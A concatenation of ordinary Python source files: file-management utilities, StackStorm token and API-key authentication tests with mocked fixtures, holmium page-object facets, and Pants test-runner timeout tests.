        return [filename]
    if isinstance(filename, list):
        return filename
    if is_container(filename):
        return list(filename)
    return None
def list_to_filename(filelist):
    """Returns a list if filelist is a list of length greater than 1,
    otherwise returns the first element
    """
    return filelist if len(filelist) > 1 else filelist[0]
def check_depends(targets, dependencies):
    """Return true if all targets exist and are newer than all dependencies.

    An OSError will be raised if there are missing dependencies.
    """
    tgts = filename_to_list(targets)
    deps = filename_to_list(dependencies)
    if not all(os.path.exists(tgt) for tgt in tgts):
        # Short-circuit like the original: missing targets mean the
        # dependencies are never stat'ed.
        return False
    newest_dep = max(list(map(os.path.getmtime, deps)) + [0])
    return min(map(os.path.getmtime, tgts)) > newest_dep
def save_json(filename, data):
    """Save data to a json file

    Parameters
    ----------
    filename : str
        Filename to save data in.
    data : dict
        Dictionary to save in json file.
    """
    # Python 2 wants the file opened in binary mode for json output.
    mode = 'wb' if sys.version_info[0] < 3 else 'w'
    with open(filename, mode) as fp:
        json.dump(data, fp, sort_keys=True, indent=4)
def load_json(filename):
    """Load data from a json file

    Parameters
    ----------
    filename : str
        Filename to load data from.

    Returns
    -------
    data : dict
    """
    with open(filename, 'r') as fp:
        return json.load(fp)
def loadcrash(infile, *args):
    """Load a crash file (pickled ``.pkl``/``.pklz``, or legacy ``.npz``).

    Parameters
    ----------
    infile : str
        Path to the crash file.

    Returns
    -------
    The unpickled crash record, or — for legacy npz files — a dict
    mapping each array name to a list of its values (unwrapped when the
    array holds a single element).

    Raises
    ------
    ValueError
        If the file is neither a pickled nor an npz crash file.
    """
    if '.pkl' in infile:
        return loadpkl(infile)
    elif '.npz' in infile:
        # BUGFIX: the original instantiated a DeprecationWarning without
        # ever emitting it; actually warn so users notice.
        import warnings
        warnings.warn('npz files will be deprecated in the next '
                      'release. you can use numpy to open them.',
                      DeprecationWarning)
        data = np.load(infile)
        out = {}
        for k in data.files:
            out[k] = [f for f in data[k].flat]
            if len(out[k]) == 1:
                out[k] = out[k].pop()
        return out
    else:
        raise ValueError('Only pickled crashfiles are supported')
def loadpkl(infile):
    """Load a zipped or plain cPickled file.

    Parameters
    ----------
    infile : str
        Path to a ``.pkl`` (plain) or ``.pklz`` (gzipped) pickle file.

    Returns
    -------
    The unpickled object.
    """
    fmlogger.debug('Loading pkl: %s', infile)
    opener = gzip.open if infile.endswith('pklz') else open
    # BUGFIX: close the handle in all cases (the original leaked it).
    with opener(infile, 'rb') as pkl_file:
        try:
            unpkl = pickle.load(pkl_file)
        except UnicodeDecodeError:
            # BUGFIX: rewind before retrying — the failed load already
            # consumed bytes from the stream.
            pkl_file.seek(0)
            unpkl = pickle.load(pkl_file, fix_imports=True,
                                encoding='utf-8')
    return unpkl
def crash2txt(filename, record):
    """ Write out plain text crash file """
    lines = []
    if 'node' in record:
        node = record['node']
        lines.append('Node: {}\n'.format(node.fullname))
        lines.append('Working directory: {}\n'.format(node.output_dir()))
        lines.append('\n')
        lines.append('Node inputs:\n{}\n'.format(node.inputs))
    lines.append(''.join(record['traceback']))
    with open(filename, 'w') as fp:
        fp.writelines(lines)
def read_stream(stream, logger=None, encoding=None):
    """
    Robustly reads a stream, sending a warning to a logger
    if some decoding error was raised.

    >>> read_stream(bytearray([65, 0xc7, 65, 10, 66])) # doctest: +ELLIPSIS +ALLOW_UNICODE
    ['A...A', 'B']
    """
    codec = encoding or locale.getdefaultlocale()[1] or 'UTF-8'
    logger = logger or fmlogger
    try:
        text = stream.decode(codec)
    except UnicodeDecodeError as err:
        # Fall back to lossy decoding and report the problem.
        text = stream.decode(codec, errors='replace')
        logger.warning('Error decoding string: %s', err)
    return text.splitlines()
def savepkl(filename, record):
    """Pickle ``record`` to ``filename`` (gzipped when it ends in pklz)."""
    opener = gzip.open if filename.endswith('pklz') else open
    with opener(filename, 'wb') as pkl_file:
        pickle.dump(record, pkl_file)
# Underline characters for successive reST heading levels.
rst_levels = ['=', '-', '~', '+']


def write_rst_header(header, level=0):
    """Return ``header`` underlined as a reST heading of ``level``."""
    underline = rst_levels[level] * len(header)
    return '\n'.join((header, underline)) + '\n\n'
def write_rst_list(items, prefix=''):
    """Return ``items`` rendered as prefixed reST lines."""
    rendered = ['{} {}'.format(prefix, str(item)) for item in items]
    return '\n'.join(rendered) + '\n\n'
def write_rst_dict(info, prefix=''):
    """Return ``info`` as a sorted reST bullet list of ``key : value``."""
    rendered = ['{}* {} : {}'.format(prefix, key, str(value))
                for key, value in sorted(info.items())]
    return '\n'.join(rendered) + '\n\n'
def dist_is_editable(dist):
    """Is distribution an editable install?

    Parameters
    ----------
    dist : string
        Package name

    # Borrowed from `pip`'s' API
    """
    # An editable (pip install -e) package leaves a .egg-link file on
    # some sys.path entry.
    return any(
        os.path.isfile(os.path.join(path_item, dist + '.egg-link'))
        for path_item in sys.path
    )
| |
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
import datetime
import bson
import mock
from st2tests.api import FunctionalTest
from st2common.util import date as date_utils
from st2common.models.db.auth import ApiKeyDB, TokenDB, UserDB
from st2common.persistence.auth import ApiKey, Token, User
from st2common.exceptions.auth import TokenNotFoundError
from st2tests.fixturesloader import FixturesLoader
# Shared fixtures for the token-based auth tests below.
OBJ_ID = bson.ObjectId()
USER = "stanley"
USER_DB = UserDB(name=USER)
TOKEN = uuid.uuid4().hex
NOW = date_utils.get_datetime_utc_now()
FUTURE = NOW + datetime.timedelta(seconds=300)  # token still valid
PAST = NOW + datetime.timedelta(seconds=-300)  # token already expired
class TestTokenBasedAuth(FunctionalTest):
    """API tests for X-Auth-Token based authentication."""

    enable_auth = True

    @mock.patch.object(
        Token,
        "get",
        mock.Mock(
            return_value=TokenDB(id=OBJ_ID, user=USER, token=TOKEN, expiry=FUTURE)
        ),
    )
    @mock.patch.object(User, "get_by_name", mock.Mock(return_value=USER_DB))
    def test_token_validation_token_in_headers(self):
        # A valid, unexpired token in the X-Auth-Token header grants access.
        response = self.app.get(
            "/v1/actions", headers={"X-Auth-Token": TOKEN}, expect_errors=False
        )
        self.assertIn("application/json", response.headers["content-type"])
        self.assertEqual(response.status_int, 200)

    @mock.patch.object(
        Token,
        "get",
        mock.Mock(
            return_value=TokenDB(id=OBJ_ID, user=USER, token=TOKEN, expiry=FUTURE)
        ),
    )
    @mock.patch.object(User, "get_by_name", mock.Mock(return_value=USER_DB))
    def test_token_validation_token_in_query_params(self):
        # The token may also be supplied as an x-auth-token query param.
        response = self.app.get(
            "/v1/actions?x-auth-token=%s" % (TOKEN), expect_errors=False
        )
        self.assertIn("application/json", response.headers["content-type"])
        self.assertEqual(response.status_int, 200)

    @mock.patch.object(
        Token,
        "get",
        mock.Mock(
            return_value=TokenDB(id=OBJ_ID, user=USER, token=TOKEN, expiry=FUTURE)
        ),
    )
    @mock.patch.object(User, "get_by_name", mock.Mock(return_value=USER_DB))
    def test_token_validation_token_in_cookies(self):
        # First request authenticates via header (and stores the cookie).
        response = self.app.get(
            "/v1/actions", headers={"X-Auth-Token": TOKEN}, expect_errors=False
        )
        self.assertIn("application/json", response.headers["content-type"])
        self.assertEqual(response.status_int, 200)

        # With cookiejar.clear patched to a no-op, the second request has
        # no header and must authenticate via the retained cookie alone.
        with mock.patch.object(self.app.cookiejar, "clear", return_value=None):
            response = self.app.get("/v1/actions", expect_errors=False)
        self.assertIn("application/json", response.headers["content-type"])
        self.assertEqual(response.status_int, 200)

    @mock.patch.object(
        Token,
        "get",
        mock.Mock(return_value=TokenDB(id=OBJ_ID, user=USER, token=TOKEN, expiry=PAST)),
    )
    def test_token_expired(self):
        # A token with an expiry in the past is rejected with 401.
        response = self.app.get(
            "/v1/actions", headers={"X-Auth-Token": TOKEN}, expect_errors=True
        )
        self.assertIn("application/json", response.headers["content-type"])
        self.assertEqual(response.status_int, 401)

    @mock.patch.object(Token, "get", mock.MagicMock(side_effect=TokenNotFoundError()))
    def test_token_not_found(self):
        # An unknown token is rejected with 401.
        response = self.app.get(
            "/v1/actions", headers={"X-Auth-Token": TOKEN}, expect_errors=True
        )
        self.assertIn("application/json", response.headers["content-type"])
        self.assertEqual(response.status_int, 401)

    def test_token_not_provided(self):
        # No credentials at all is rejected with 401.
        response = self.app.get("/v1/actions", expect_errors=True)
        self.assertIn("application/json", response.headers["content-type"])
        self.assertEqual(response.status_int, 401)
# Fixture pack and models loaded for the API-key based auth tests.
FIXTURES_PACK = "generic"
TEST_MODELS = {"apikeys": ["apikey1.yaml", "apikey_disabled.yaml"]}

# Hardcoded keys matching the fixtures. Lazy way to workaround one-way hash and still use fixtures.
KEY1_KEY = "1234"  # plain-text key for apikey1.yaml
DISABLED_KEY = "0000"  # plain-text key for apikey_disabled.yaml
class TestApiKeyBasedAuth(FunctionalTest):
    """API-key based authentication scenarios against the /v1/actions endpoint."""

    enable_auth = True
    apikey1 = None
    apikey_disabled = None

    @classmethod
    def setUpClass(cls):
        # Load the API key fixtures into the DB once for the whole class.
        super(TestApiKeyBasedAuth, cls).setUpClass()
        models = FixturesLoader().save_fixtures_to_db(
            fixtures_pack=FIXTURES_PACK, fixtures_dict=TEST_MODELS
        )
        cls.apikey1 = models["apikeys"]["apikey1.yaml"]
        cls.apikey_disabled = models["apikeys"]["apikey_disabled.yaml"]

    @mock.patch.object(User, "get_by_name", mock.Mock(return_value=UserDB(name="bill")))
    def test_apikey_validation_apikey_in_headers(self):
        # A valid key in the St2-Api-key header is accepted.
        response = self.app.get(
            "/v1/actions", headers={"St2-Api-key": KEY1_KEY}, expect_errors=False
        )
        self.assertIn("application/json", response.headers["content-type"])
        self.assertEqual(response.status_int, 200)

    @mock.patch.object(User, "get_by_name", mock.Mock(return_value=UserDB(name="bill")))
    def test_apikey_validation_apikey_in_query_params(self):
        # A valid key in the st2-api-key query parameter is accepted.
        response = self.app.get(
            "/v1/actions?st2-api-key=%s" % (KEY1_KEY), expect_errors=False
        )
        self.assertIn("application/json", response.headers["content-type"])
        self.assertEqual(response.status_int, 200)

    @mock.patch.object(User, "get_by_name", mock.Mock(return_value=UserDB(name="bill")))
    def test_apikey_validation_apikey_in_cookies(self):
        # First request (with header) succeeds; the follow-up request without
        # any credentials must come back 401.
        response = self.app.get(
            "/v1/actions", headers={"St2-Api-key": KEY1_KEY}, expect_errors=False
        )
        self.assertIn("application/json", response.headers["content-type"])
        self.assertEqual(response.status_int, 200)

        with mock.patch.object(self.app.cookiejar, "clear", return_value=None):
            response = self.app.get("/v1/actions", expect_errors=True)
            self.assertEqual(response.status_int, 401)
            self.assertEqual(
                response.json_body["faultstring"],
                "Unauthorized - One of Token or API key required.",
            )

    def test_apikey_disabled(self):
        # A key present in the DB but marked disabled is rejected.
        response = self.app.get(
            "/v1/actions", headers={"St2-Api-key": DISABLED_KEY}, expect_errors=True
        )
        self.assertIn("application/json", response.headers["content-type"])
        self.assertEqual(response.status_int, 401)
        self.assertEqual(
            response.json_body["faultstring"], "Unauthorized - API key is disabled."
        )

    def test_apikey_not_found(self):
        # An unknown key is rejected; the fault string includes the key hash.
        response = self.app.get(
            "/v1/actions", headers={"St2-Api-key": "UNKNOWN"}, expect_errors=True
        )
        self.assertIn("application/json", response.headers["content-type"])
        self.assertEqual(response.status_int, 401)
        # NOTE(review): assertRegexpMatches is a deprecated alias of
        # assertRegex (removed in Python 3.12) — confirm the target runtime.
        self.assertRegexpMatches(
            response.json_body["faultstring"],
            "^Unauthorized - ApiKey with key_hash=([a-zA-Z0-9]+) not found.$",
        )

    @mock.patch.object(
        Token,
        "get",
        mock.Mock(
            return_value=TokenDB(id=OBJ_ID, user=USER, token=TOKEN, expiry=FUTURE)
        ),
    )
    @mock.patch.object(
        ApiKey,
        "get",
        mock.Mock(return_value=ApiKeyDB(user=USER, key_hash=KEY1_KEY, enabled=True)),
    )
    @mock.patch.object(User, "get_by_name", mock.Mock(return_value=USER_DB))
    def test_multiple_auth_sources(self):
        # Supplying both a valid token and a valid API key must still succeed.
        response = self.app.get(
            "/v1/actions",
            headers={"X-Auth-Token": TOKEN, "St2-Api-key": KEY1_KEY},
            expect_errors=True,
        )
        self.assertIn("application/json", response.headers["content-type"])
        self.assertEqual(response.status_int, 200)
| |
"""
implementation of facet bases and builtin facets
"""
import inspect
import weakref
from abc import ABCMeta, abstractmethod
import re
# pylint: disable=no-name-in-module,abstract-class-not-used
from nose.tools import assert_equals, assert_true
from six import add_metaclass
from .logger import log
@add_metaclass(ABCMeta)
class Facet(object):
    """
    base class to implement an attribute of a page

    Subclasses declare required constructor arguments in ``__ARGS__`` and
    optional arguments (with their defaults) in ``__OPTIONS__``.
    """
    __ARGS__ = []  # names of mandatory keyword arguments for subclasses
    __OPTIONS__ = {}  # optional keyword arguments mapped to default values
    __ALLOW_MULTIPLE__ = True  # may several facets of this type coexist on one object?

    def __init__(self, required=True, debug=False, **kwargs):
        """
        :param bool required: if False, evaluation failures are treated as noops.
        :param bool debug: if True, evaluation failures only log a warning.
        :param kwargs: values for the subclass's __ARGS__ / __OPTIONS__.
        :raises AttributeError: on a missing required or unknown argument.
        """
        self.arguments = {}
        self.options = {}
        self.required = required
        self.debug = debug
        self._parent_class = None
        # consume the required arguments first ...
        for arg in self.__ARGS__:
            if arg not in kwargs.keys():
                raise AttributeError("%s is a required argument for %s" % (
                    arg, self.__class__.__name__))
            else:
                self.arguments[arg] = kwargs[arg]
                kwargs.pop(arg)
        # ... then the optional ones, falling back to their declared defaults
        for arg in self.__OPTIONS__:
            if arg in kwargs.keys():
                self.options[arg] = kwargs[arg]
                kwargs.pop(arg)
            else:
                self.options[arg] = self.__OPTIONS__[arg]
        # anything left over was never declared by the subclass
        if kwargs:
            raise AttributeError("unknown argument(s) to %s (%s)" % (
                self.__class__.__name__, ",".join(kwargs.keys())))

    def register(self, obj):
        """
        registers a :class:`Facet` on an object

        :param holmium.core.facets.Faceted obj: the object to register the
         facet on.
        """
        # class decorations register on the class facet list, instance
        # decorations on the instance facet list.
        if inspect.isclass(obj):
            obj.get_class_facets().append(self)
            self.parent_class = obj
        else:
            obj.get_instance_facets().append(self)
            self.parent_class = obj.__class__

    def __call__(self, obj):
        # lets a facet instance be used directly as a decorator
        self.register(obj)
        return obj

    def get_name(self):
        """
        returns the class name of the facet
        """
        return self.__class__.__name__

    @property
    def parent_class(self):
        """
        returns the parent class
        """
        # dereference the weakref stored by the setter
        return self._parent_class()

    @parent_class.setter
    def parent_class(self, parent):
        """
        sets the parent class
        """
        # held weakly so a registered facet does not keep the class alive
        self._parent_class = weakref.ref(parent)

    def get_parent_name(self):
        """
        returns the class name of the parent
        """
        return (self.parent_class and self.parent_class.__name__) or None

    @abstractmethod
    def evaluate(self, driver):
        """
        evaluate whether this facet holds true. Raise an Exception
        if not.

        :param selenium.webdriver.remote.webdriver.WebDriver driver: the
         webdriver
        """
class FacetError(Exception):
    """
    exception raised when a facet has an error
    or can't complete

    :param holmium.core.facets.Facet facet: the facet that failed to evaluate
    :param exceptions.Exception exc: the inner exception that caused the
     failure
    """

    def __init__(self, facet, exc=None):
        parts = ["%s failed to exhibit facet %s" % (
            facet.get_parent_name(), facet.get_name())]
        if exc:
            parts.append(" with error %s" % exc)
        self.message = "".join(parts)
        super(FacetError, self).__init__(self.message)
class FacetCollection(list):
    """
    utility collection class for pageobjects to encapsulate
    facets
    """

    def __init__(self, *a):
        super(FacetCollection, self).__init__(*a)

    @property
    def type_map(self):
        """
        view on the list to help with figuring out
        if a facet of the same type already exists
        """
        grouped = {}
        for facet in self:
            grouped.setdefault(type(facet), []).append(facet)
        return grouped

    def append(self, item):
        """
        overridden add method to pop the last
        item if its type does not support multiple
        facets on the same object.
        """
        existing = self.type_map
        item_type = type(item)
        if item_type in existing and not item_type.__ALLOW_MULTIPLE__:
            # evict the most recently registered facet of the same type
            self.remove(existing[item_type].pop())
        if item not in self:
            super(FacetCollection, self).append(item)

    def evaluate_all(self, driver):
        """
        iterate over all registered :class:`Facet` objects and validate them

        :param selenium.webdriver.remote.webdriver.WebDriver driver:
         the webdriver
        """
        for facet in self:
            try:
                facet.evaluate(driver)
            # pylint: disable=broad-except
            except Exception as exc:
                if facet.debug:
                    log.warn(FacetError(facet, exc))
                elif facet.required:
                    raise FacetError(facet, exc)
class CopyOnCreateFacetCollectionMeta(ABCMeta):
    """
    makes a new copy of any :class:`FacetCollection`
    instances upon creating the class. This is to ensure
    that different derived classes of :class:`Page`
    do not clobber the class facets of the base class.
    """
    def __init__(cls, *args):
        super(CopyOnCreateFacetCollectionMeta, cls).__init__(*args)
        # Walk the full MRO and merge every FacetCollection attribute found
        # on any ancestor into a fresh collection owned by *this* class, so
        # mutating it later never touches the base class's collection.
        visited = {}
        for superclass in cls.__mro__:
            for key, value in vars(superclass).items():
                if isinstance(value, (FacetCollection)):
                    visited.setdefault(key, FacetCollection())
                    for facet in value:
                        visited[key].append(facet)
                    setattr(cls, key, FacetCollection(visited[key]))
@add_metaclass(CopyOnCreateFacetCollectionMeta)
class Faceted(object):
    """
    mixin for objects that want to have facets registered
    on them.
    """
    def __init__(self):
        self.instance_facets = FacetCollection()
        super(Faceted, self).__init__()

    @classmethod
    def get_class_facets(cls):
        """
        returns the facets registered on the class (presumably
        via a decorator)
        """
        # created lazily so subclasses need no boilerplate
        if not hasattr(cls, "class_facets"):
            cls.class_facets = FacetCollection()
        return cls.class_facets

    def get_instance_facets(self):
        """
        returns the facets registered on the instance
        """
        # object.__getattribute__ sidesteps any __getattribute__ override
        # a subclass may define (page objects proxy attribute access).
        return object.__getattribute__(self, "instance_facets")

    def evaluate(self):
        """
        evaluates all registered facets (class & instance)
        """
        # imported here to avoid a circular import with .pageobject
        from .pageobject import Page

        def safe_get(e):
            # fetch attributes without triggering subclass attribute magic
            return object.__getattribute__(self, e)

        driver = Page.get_driver()
        instance_facets = safe_get("get_instance_facets")()
        class_facets = safe_get("get_class_facets")()
        class_facets.evaluate_all(driver)
        instance_facets.evaluate_all(driver)
class Defer(Facet):
    """
    facet that defers validation to another page object by invoking a
    callable against an instance of that page.

    :param holmium.core.Page page: the page object that is expected to be
     deferred to
    :param function action: a callable that takes the page object instance as
     the first argument
    :param dict action_arguments: (optional) dictionary of arguments to pass to
     `action`
    :param bool debug: if True a failure to evaluate will not result in an
     exception, only a log warning
    :param bool required: if False a failure to evaluate will be treated as a
     noop.
    """
    __ARGS__ = ["page", "action"]
    __OPTIONS__ = {"action_arguments": {}}

    def evaluate(self, driver):
        target_page = self.arguments["page"](driver)
        callback = self.arguments["action"]
        extra = self.options["action_arguments"]
        return callback(target_page, **extra)
class Title(Facet):
    """
    enforces the title of the current page.

    :param str title: a regular expression to match the title.
    :param bool debug: if True a failure to evaluate will not result in an
     exception, only a log warning
    :param bool required: if False a failure to evaluate will be treated as
     a noop.
    """
    __ARGS__ = ["title"]
    __ALLOW_MULTIPLE__ = False

    def evaluate(self, driver):
        expected = self.arguments["title"]
        matched = re.compile(expected).match(driver.title)
        assert_true(matched, "title did not match %s" % expected)
class Cookie(Facet):
    """
    enforces the existence (and optionally the value) of a cookie.

    :param str name: name of the cookie
    :param dict value: (optional) dict (or callable) to validate the value of
     the cookie.
    :param bool debug: if True a failure to evaluate will not result in an
     exception, only a log warning
    :param bool required: if False a failure to evaluate will be treated as
     a noop.
    """
    __ARGS__ = ["name"]
    __OPTIONS__ = {"value": None}

    def evaluate(self, driver):
        name = self.arguments["name"]
        expected = self.options["value"]
        actual = driver.get_cookie(name)
        if actual and expected:
            # validate via callable predicate or direct equality
            if callable(expected):
                assert expected(actual)
            else:
                assert_equals(actual, expected)
        else:
            # only existence was requested (or the cookie is missing)
            assert_true(actual is not None,
                        "cookie %s does not exist" % name)
class Strict(Facet):
    """
    enforces that every element declared in the :class:`Page` or
    :class:`Section` be present.

    :param bool debug: if True a failure to evaluate will not result in an
     exception, only a log warning
    :param bool required: if False a failure to evaluate will be treated as a
     noop.
    """

    def evaluate(self, driver):
        pass  # pragma: no cover

    def __call__(self, obj):
        # imported here to avoid a circular import with .pageobject
        from .pageobject import ElementGetter
        for _name, member in inspect.getmembers(obj):
            if isinstance(member, ElementGetter):
                # flag each declared element so it is validated like a facet
                member.is_facet = True
                member.is_debug_facet = self.debug
        return obj
class ElementFacet(Facet):
    """
    utility trait used when validating an
    :class:`holmium.core.pageobject.ElementGetter` subclass
    """

    def __init__(self, element, element_name, **kwargs):
        self.element_name = element_name
        self.element = element
        super(ElementFacet, self).__init__(required=True, **kwargs)

    def evaluate(self, driver):
        # resolve the descriptor against the owning class and require a
        # truthy result
        resolved = self.element.__get__(self.parent_class, self.parent_class)
        assert_true(resolved, "No such element")

    def get_name(self):
        # report the declared element name rather than the class name
        return self.element_name
# pylint: disable=invalid-name
# lowercase aliases so facets read naturally when used as decorators,
# e.g. @title("Home.*")
cookie = Cookie
strict = Strict
defer = Defer
title = Title
| |
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import collections
from mock import patch
from pants.base.exceptions import TestFailedTaskError
from pants.task.task import TaskBase
from pants.task.testrunner_task_mixin import TestRunnerTaskMixin
from pants.util.process_handler import ProcessHandler
from pants.util.timeout import TimeoutReached
from pants_test.tasks.task_test_base import TaskTestBase
class DummyTestTarget(object):
    """Minimal stand-in for a test target: a name, an optional timeout, and
    an address whose ``spec`` mirrors the name."""

    def __init__(self, name, timeout=None):
        address_type = collections.namedtuple('address', ['spec'])
        self.name = name
        self.timeout = timeout
        self.address = address_type(spec=name)
# Shared fixture targets: no timeout, a 1-second timeout, a 10-second timeout.
targetA = DummyTestTarget('TargetA')
targetB = DummyTestTarget('TargetB', timeout=1)
targetC = DummyTestTarget('TargetC', timeout=10)
class TestRunnerTaskMixinTest(TaskTestBase):
    """Exercises target filtering, validation and timeout computation of
    TestRunnerTaskMixin via a recording fake task."""

    @classmethod
    def task_type(cls):
        class TestRunnerTaskMixinTask(TestRunnerTaskMixin, TaskBase):
            # shared recorder of every hook invocation, asserted on below
            call_list = []

            def _execute(self, all_targets):
                self.call_list.append(['_execute', all_targets])
                self._spawn_and_wait()

            def _spawn(self, *args, **kwargs):
                self.call_list.append(['_spawn', args, kwargs])

                class FakeProcessHandler(ProcessHandler):
                    # `_` is the handler instance; the closed-over `self` is
                    # the task, so calls are recorded on the task's call_list.
                    def wait(_):
                        self.call_list.append(['process_handler.wait'])
                        return 0

                    def kill(_):
                        self.call_list.append(['process_handler.kill'])

                    def terminate(_):
                        self.call_list.append(['process_handler.terminate'])

                    def poll(_):
                        self.call_list.append(['process_handler.poll'])

                return FakeProcessHandler()

            def _get_targets(self):
                return [targetA, targetB]

            def _test_target_filter(self):
                def target_filter(target):
                    self.call_list.append(['target_filter', target])
                    if target.name == 'TargetA':
                        return False
                    else:
                        return True

                return target_filter

            def _validate_target(self, target):
                self.call_list.append(['_validate_target', target])

        return TestRunnerTaskMixinTask

    def test_execute_normal(self):
        task = self.create_task(self.context())

        task.execute()

        # Confirm that everything ran as expected
        self.assertIn(['target_filter', targetA], task.call_list)
        self.assertIn(['target_filter', targetB], task.call_list)
        self.assertIn(['_validate_target', targetB], task.call_list)
        self.assertIn(['_execute', [targetA, targetB]], task.call_list)

    def test_execute_skip(self):
        # Set the skip option
        self.set_options(skip=True)
        task = self.create_task(self.context())
        task.execute()

        # Ensure nothing got called
        self.assertListEqual(task.call_list, [])

    def test_get_timeouts_no_default(self):
        """If there is no default and one of the targets has no timeout, then there is no timeout for the entire run."""

        self.set_options(timeouts=True, timeout_default=None)
        task = self.create_task(self.context())

        self.assertIsNone(task._timeout_for_targets([targetA, targetB]))

    def test_get_timeouts_disabled(self):
        """If timeouts are disabled, there is no timeout for the entire run."""

        self.set_options(timeouts=False, timeout_default=2)
        task = self.create_task(self.context())

        self.assertIsNone(task._timeout_for_targets([targetA, targetB]))

    def test_get_timeouts_with_default(self):
        """If there is a default timeout, use that for targets which have no timeout set."""

        self.set_options(timeouts=True, timeout_default=2)
        task = self.create_task(self.context())

        # targetA falls back to the default (2) and targetB contributes 1.
        # NOTE(review): assertEquals is a deprecated alias of assertEqual.
        self.assertEquals(task._timeout_for_targets([targetA, targetB]), 3)

    def test_get_timeouts_with_maximum(self):
        """If a timeout exceeds the maximum, set it to that."""

        self.set_options(timeouts=True, timeout_maximum=1)
        task = self.create_task(self.context())
        self.assertEquals(task._timeout_for_targets([targetC]), 1)

    def test_default_maximum_conflict(self):
        """If the default exceeds the maximum, throw an error."""

        self.set_options(timeouts=True, timeout_maximum=1, timeout_default=10)
        task = self.create_task(self.context())
        with self.assertRaises(TestFailedTaskError):
            task.execute()
class TestRunnerTaskMixinSimpleTimeoutTest(TaskTestBase):
    """Verifies that the mixin wraps execution in a Timeout built from the
    targets' timeout settings."""

    @classmethod
    def task_type(cls):
        class TestRunnerTaskMixinTask(TestRunnerTaskMixin, TaskBase):
            call_list = []

            def _execute(self, all_targets):
                self.call_list.append(['_execute', all_targets])
                self._spawn_and_wait()

            def _spawn(self, *args, **kwargs):
                self.call_list.append(['_spawn', args, kwargs])

                class FakeProcessHandler(ProcessHandler):
                    # `_` is the handler instance; the closed-over `self` is
                    # the task, so calls are recorded on the task's call_list.
                    def wait(_):
                        self.call_list.append(['process_handler.wait'])
                        return 0

                    def kill(_):
                        self.call_list.append(['process_handler.kill'])

                    def terminate(_):
                        self.call_list.append(['process_handler.terminate'])

                    def poll(_):
                        self.call_list.append(['process_handler.poll'])
                        return 0

                return FakeProcessHandler()

            def _get_targets(self):
                # single target with a 1-second timeout
                return [targetB]

            def _test_target_filter(self):
                def target_filter(target):
                    return True

                return target_filter

            def _validate_target(self, target):
                self.call_list.append(['_validate_target', target])

        return TestRunnerTaskMixinTask

    def test_timeout(self):
        self.set_options(timeouts=True)
        task = self.create_task(self.context())

        with patch('pants.task.testrunner_task_mixin.Timeout') as mock_timeout:
            mock_timeout().__exit__.side_effect = TimeoutReached(1)

            with self.assertRaises(TestFailedTaskError):
                task.execute()

            # Ensures that Timeout is instantiated with a 1 second timeout.
            args, kwargs = mock_timeout.call_args
            self.assertEqual(args, (1,))

    def test_timeout_disabled(self):
        self.set_options(timeouts=False)
        task = self.create_task(self.context())

        with patch('pants.task.testrunner_task_mixin.Timeout') as mock_timeout:
            task.execute()

            # Ensures that Timeout is instantiated with no timeout.
            args, kwargs = mock_timeout.call_args
            self.assertEqual(args, (None,))
class TestRunnerTaskMixinGracefulTimeoutTest(TaskTestBase):
    """Verifies graceful (terminate, then kill only if still alive) shutdown
    of the spawned process when a timeout fires."""

    def create_process_handler(self, return_none_first=True):
        """Build a fake handler whose poll() reports the process as still
        alive on the first call when ``return_none_first`` is True (forcing
        the kill path), else as already exited."""
        class FakeProcessHandler(ProcessHandler):
            call_list = []
            poll_called = False

            def wait(self):
                self.call_list.append(['process_handler.wait'])
                return 0

            def kill(self):
                self.call_list.append(['process_handler.kill'])

            def terminate(self):
                self.call_list.append(['process_handler.terminate'])

            def poll(self):
                print("poll called")
                self.call_list.append(['process_handler.poll'])
                if not self.poll_called and return_none_first:
                    self.poll_called = True
                    return None
                else:
                    return 0

        return FakeProcessHandler()

    # NOTE(review): unlike the sibling test classes, task_type is NOT
    # decorated with @classmethod. The inner task reads cls.process_handler,
    # which here resolves to the instance attribute set by each test when
    # this is invoked as self.task_type() — confirm this is intentional
    # before adding the decorator.
    def task_type(cls):
        class TestRunnerTaskMixinTask(TestRunnerTaskMixin, TaskBase):
            call_list = []

            def _execute(self, all_targets):
                self.call_list.append(['_execute', all_targets])
                self._spawn_and_wait()

            def _spawn(self, *args, **kwargs):
                self.call_list.append(['_spawn', args, kwargs])

                return cls.process_handler

            def _get_targets(self):
                return [targetA, targetB]

            def _test_target_filter(self):
                def target_filter(target):
                    self.call_list.append(['target_filter', target])
                    if target.name == 'TargetA':
                        return False
                    else:
                        return True

                return target_filter

            def _validate_target(self, target):
                self.call_list.append(['_validate_target', target])

        return TestRunnerTaskMixinTask

    def test_graceful_terminate_if_poll_is_none(self):
        self.process_handler = self.create_process_handler(return_none_first=True)

        self.set_options(timeouts=True)
        task = self.create_task(self.context())

        with patch('pants.task.testrunner_task_mixin.Timer') as mock_timer:
            # Fire the timeout handler immediately when the timer is started.
            def set_handler(dummy, handler):
                mock_timer_instance = mock_timer.return_value
                mock_timer_instance.start.side_effect = handler
                return mock_timer_instance

            mock_timer.side_effect = set_handler
            with self.assertRaises(TestFailedTaskError):
                task.execute()

            # Ensure that all the calls we want to kill the process gracefully are made.
            self.assertEqual(self.process_handler.call_list,
                             [[u'process_handler.terminate'], [u'process_handler.poll'], [u'process_handler.kill'], [u'process_handler.wait']])

    def test_graceful_terminate_if_poll_is_zero(self):
        self.process_handler = self.create_process_handler(return_none_first=False)

        self.set_options(timeouts=True)
        task = self.create_task(self.context())

        with patch('pants.task.testrunner_task_mixin.Timer') as mock_timer:
            # Fire the timeout handler immediately when the timer is started.
            def set_handler(dummy, handler):
                mock_timer_instance = mock_timer.return_value
                mock_timer_instance.start.side_effect = handler
                return mock_timer_instance

            mock_timer.side_effect = set_handler
            with self.assertRaises(TestFailedTaskError):
                task.execute()

            # Ensure that we only call terminate, and not kill.
            self.assertEqual(self.process_handler.call_list,
                             [[u'process_handler.terminate'], [u'process_handler.poll'], [u'process_handler.wait']])
| |
from ..exceptions import ConfigurationError
